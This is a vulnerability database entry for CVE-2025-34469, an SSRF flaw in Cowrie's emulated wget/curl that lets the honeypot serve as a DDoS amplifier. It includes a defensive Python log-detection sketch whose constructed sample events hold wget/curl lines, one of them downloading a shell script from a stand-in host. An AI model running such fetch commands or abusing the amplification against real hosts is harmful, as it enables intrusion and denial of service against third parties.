CVE-2025-34469
Published 2025-12-31
Priority: P180 high, 7.5 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:N / A:H
ITW: VulnCheck KEV
Exploited in the wild
EPSS: 0.62% (45.0th percentile)
Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
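A detection sketch for the abuse pattern described above, added here as an example and not taken from Cowrie or any of the advisories: it scans Cowrie JSON log lines for sources that invoke the emulated `wget`/`curl` more than a threshold number of times inside a sliding window, and reports which hosts they pointed the honeypot at. The event name `cowrie.command.input`, the field names, the threshold and the sample events are assumptions or constructed for illustration.

```python
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample events; field names follow Cowrie's JSON log (assumed).
ROWS = [("198.51.100.7", s, "wget http://victim.example/") for s in range(12)]
ROWS += [("203.0.113.9", 5, "curl -O http://files.example/a.sh"), ("203.0.113.9", 40, "uname -a")]
SAMPLE_LOG = "\n".join(json.dumps({"eventid": "cowrie.command.input", "src_ip": ip,
    "timestamp": f"2025-12-20T10:00:{s:02d}.000000Z", "input": cmd}) for ip, s, cmd in ROWS)

# wget/curl at line start or after a shell separator, followed by its arguments.
FETCH = re.compile(r"(?:^|[;&|])\s*(?:wget|curl)\b([^;&|]*)")

def fetch_targets(command):
    """Hosts a wget/curl invocation would contact (option values may be miscounted)."""
    hosts = []
    for args in FETCH.findall(command):
        for tok in args.split():
            if tok.startswith("-"):
                continue
            try:
                host = urlparse(tok if "://" in tok else "http://" + tok).hostname
            except ValueError:
                continue  # malformed URL, e.g. an unclosed IPv6 bracket
            if host:
                hosts.append(host)
    return hosts

def flag_abuse(log_text, max_fetches=5, window=timedelta(seconds=60)):
    """Return {src_ip: {host: count}} for sources above max_fetches per window."""
    recent, targets, flagged = defaultdict(deque), defaultdict(dict), set()
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not JSON events
        if ev.get("eventid") != "cowrie.command.input":
            continue
        ts = datetime.fromisoformat(ev["timestamp"].replace("Z", "+00:00"))
        src, q = ev["src_ip"], recent[ev["src_ip"]]
        for host in fetch_targets(ev.get("input", "")):
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()  # drop fetches that fell out of the window
            targets[src][host] = targets[src].get(host, 0) + 1
            if len(q) > max_fetches:
                flagged.add(src)
    return {ip: targets[ip] for ip in sorted(flagged)}
```

A flagged source whose requests concentrate on one host is the signature of the honeypot being used as a traffic relay rather than as a payload download target.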
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cowrie | cowrie | < 2.9.0 | 2.9.0 |
| cowrie | cowrie | >= 0 < 2.9.0 | 2.9.0 |
CVSS provenance
nvd v3.1: 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvd v4.0: 6.9 MEDIUM CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck: 6.9 MEDIUM
OSV
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
osv·2025-12-20
CVE-2025-34469 [MEDIUM] Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
### Summary
A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.
### Details
When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The `wget` and `curl` command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.
An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands t
GHSA
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
ghsa·2025-12-20
CVE-2025-34469 [MEDIUM] CWE-918 Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
VulnCheck
Cowrie Unrestricted wget/curl Emulation SSRF-Based DDoS Amplification
vulncheck·2025·CVSS 6.9
CVE-2025-34469 [MEDIUM] Cowrie Unrestricted wget/curl Emulation SSRF-Based DDoS Amplification
Affected: Cowrie Cowrie
Required Action: Apply remediations or mitigations per vend
No detection rules found.
No public exploits indexed.
https://github.com/advisories/GHSA-83jg-m2pm-4jxj
https://github.com/cowrie/cowrie/issues/2622
https://github.com/cowrie/cowrie/pull/2800
https://github.com/cowrie/cowrie/releases/tag/v2.9.0
https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification